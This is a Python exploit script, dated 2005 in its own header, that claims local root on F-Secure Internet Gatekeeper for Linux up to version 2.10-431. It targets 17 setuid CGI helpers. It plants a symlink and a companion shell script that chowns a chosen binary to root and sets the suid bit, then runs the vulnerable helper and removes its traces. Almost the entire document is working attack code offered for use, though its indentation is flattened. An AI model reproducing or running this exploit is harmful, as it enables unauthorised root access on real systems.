#!/usr/bin/env python
################################################################
## fsigk_exp.py: F-Secure Internet Gatekeeper for Linux local root exploit
## acknowledgements: everyone in pure-elite and uDc.
##
## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
################################################################

################################################################
## Make proper checks and import nessesary calls from modules.
##

try: 
from sys import argv
except Exception: 
print "the 'sys' module could not be loaded"
raise SystemExit

try: 
from os import unlink, stat, error, symlink, system, chmod
except Exception:
print "the 'os' module could not be loaded"
raise SystemExit

try: 
import getopt
except Exception: 
print "the 'getopt' module could not be loaded"
raise SystemExit

################################################################
## Constants.
##

__program__ = argv[0]
__version__ = "0.1beta"
__author__ = "<xavier@tigerteam.se>"
__lastedit__ = "Thu Sep 22 23:18:39 EDT 2005"
__usage__ = """usage: %s [-options]

options:
--version show program's version number and exit.
-h, --help show this help message and exit.

-s, --suid file location to suid.
-d, --dir cgi directory.
-c, --clean cleans any left over files from the environment creation.
-# enter numerical value of vulnerable file to exploit. [list below]

1: ifconfig_suid.cgi | 2: reboot_suid.cgi | 3: proxy_suid.cgi
4: edittmpl_suid.cgi | 5: version_suid.cgi | 6: hostname_suid.cgi
7: gateway_suid.cgi | 8: halt_suid.cgi | 9: edituserdb_suid.cgi
10: htpasswd_suid.cgi | 11: pattern_up_suid.cgi | 12: license_suid.cgi
13: iptables_suid.cgi | 14: dns_suid.cgi | 15: pattern_autoup_suid.cgi
16: spam_list_suid.cgi | 17: diag_suid.cgi""" % (__program__)

################################################################
## Functions.
##

def _write(file, payload):
try: 
open(file, 'w').write(payload)
chmod(file, 0100)
except Exception, err: 
print ("[-] %s" % (err))

def _exists(path):
try: 
stat(path)
except error:
return False
return True

def _handleopts():
for opt in argv[1:]:
if opt in ("-h", "--help"): 
print "%s" % (__usage__),
raise SystemExit
if opt in ("-v", "--version"): 
print "%s (%s)" % (__version__, __lastedit__),
raise SystemExit

_method_ = 'ifconfig_suid.cgi'
_file_ = 'ifconfig.cgi'
for opt in argv[1:]:
if opt == "-1": 
_method_ = 'ifconfig_suid.cgi'
elif opt == "-2": 
_method_ = 'reboot_suid.cgi'
_file_ = 'reboot.cgi'
elif opt == "-3": 
_method_ = 'proxy_suid.cgi'
_file_ = 'proxy.cgi'
elif opt == "-4": 
_method_ = 'edittmpl_suid.cgi'
_file_ = 'edittmpl.cgi'
elif opt == "-5": 
_method_ = 'version_suid.cgi'
_file_ = 'version.cgi'
elif opt == "-6": 
_method_ = 'hostname_suid.cgi'
_file_ = 'hostname.cgi'
elif opt == "-7": 
_method_ = 'gateway_suid.cgi'
_file_ = 'gateway.cgi'
elif opt == "-8": 
_method_ = 'halt_suid.cgi'
_file_ = 'halt.cgi'
elif opt == "-9": 
_method_ = 'edituserdb_suid.cgi'
_file_ = 'edituserdb.cgi'
elif opt == "-10": 
_method_ = 'htpasswd_suid.cgi'
_file_ = 'htpasswd.cgi'
elif opt == "-11": 
_method_ = 'pattern_up_suid.cgi'
_file_ = 'pattern_up.cgi'
elif opt == "-12": 
_method_ = 'license_suid.cgi'
_file_ = 'license.cgi'
elif opt == "-13":
_method_ = 'iptables_suid.cgi'
_file_ = 'iptables.cgi'
elif opt == "-14": 
_method_ = 'dns_suid.cgi'
_file_ = 'dns.cgi'
elif opt == "-15": 
_method_ = 'pattern_autoup_suid.cgi'
_file_ = 'pattern_autoup.cgi'
elif opt == "-16": 
_method_ = 'spam_list_suid.cgi'
_file_ = 'spam_list.cgi'
elif opt == "-17": 
_method_ = 'diag_suid.cgi'
_file_ = 'diag.cgi'
else: 
pass

try:
opts = getopt.getopt(argv[1:], 'c1234567890s:d:', ['clean', \
'suid=', \
'dir='])[0]
except Exception, (err):
print "[-] %s" % (err),
raise SystemExit

_dir_ = None
_payload_ = None
_combine_ = None

for o, a in opts:
if o in ("-c", "--clean"): 
_clean()
print "[*] done"
raise SystemExit
if o in ("-d", "--dir"): 
if _exists(a): 
_dir_ = a
else: 
print "[-] unable to access the %s directory" % (_dir_),
raise SystemExit
if o in ("-s", "--suid"): 
if _exists(a): 
_payload_ = _suid(a)
else: 
print "[-] unable to access binary."
raise SystemExit

if _dir_ == None: 
print "[-] no directory was given [try -h for help menu]"
raise SystemExit
if _payload_ == None: 
print "[-] enter binary to suid [try -h for help menu]"
raise SystemExit
_combined_ = "%s/%s" % (_dir_, _method_)
if not _exists(_combined_): 
print "[-] method not possible, try another."
raise SystemExit

print "[*] creating environment..."
try:
symlink('%s/%s' % (_dir_, _method_), 'runbad')
_write(_file_, _payload_)
except Exception, err:
raise SystemExit


def _suid(file):
_suid_ = """#!/bin/sh
chown 0.0 %(file)s
chmod 4755 %(file)s
""" % (locals())
return _suid_


def _clean():
try:
files = ['runbad', 'ifconfig.cgi', 'reboot.cgi', 'proxy.cgi', 
'edittmpl.cgi', 'version.cgi', 'hostname.cgi', 'gateway.cgi',
'halt.cgi', 'edituserdb.cgi', 'htpasswd.cgi', 'pattern_up.cgi',
'license.cgi', 'iptables.cgi', 'dns.cgi', 'pattern_autoup.cgi', 
'spam_list.cgi', 'diag_suid.cgi']

for file in files:
if _exists(file): unlink(file)

except Exception, err:
print "[-] %s" % (err),


#################################################################
## main() // main code.
##

def main():
try:
print "[INFO] F-Secure Internet Gatekeeper for Linux <=2.10-431 local exploit by %s" % (__author__)
print "[*] handling options, arguments..."
_handleopts()
print "[*] executing exploit..."
system('./runbad')
print "[*] cleaning..."
_clean()
print "[*] done... try executing the specified binary."
except KeyboardInterrupt:
print "[-] caught keyboard interuption"
raise SystemExit
except Exception, (err): 
_clean()
raise SystemExit

if __name__ == '__main__': main()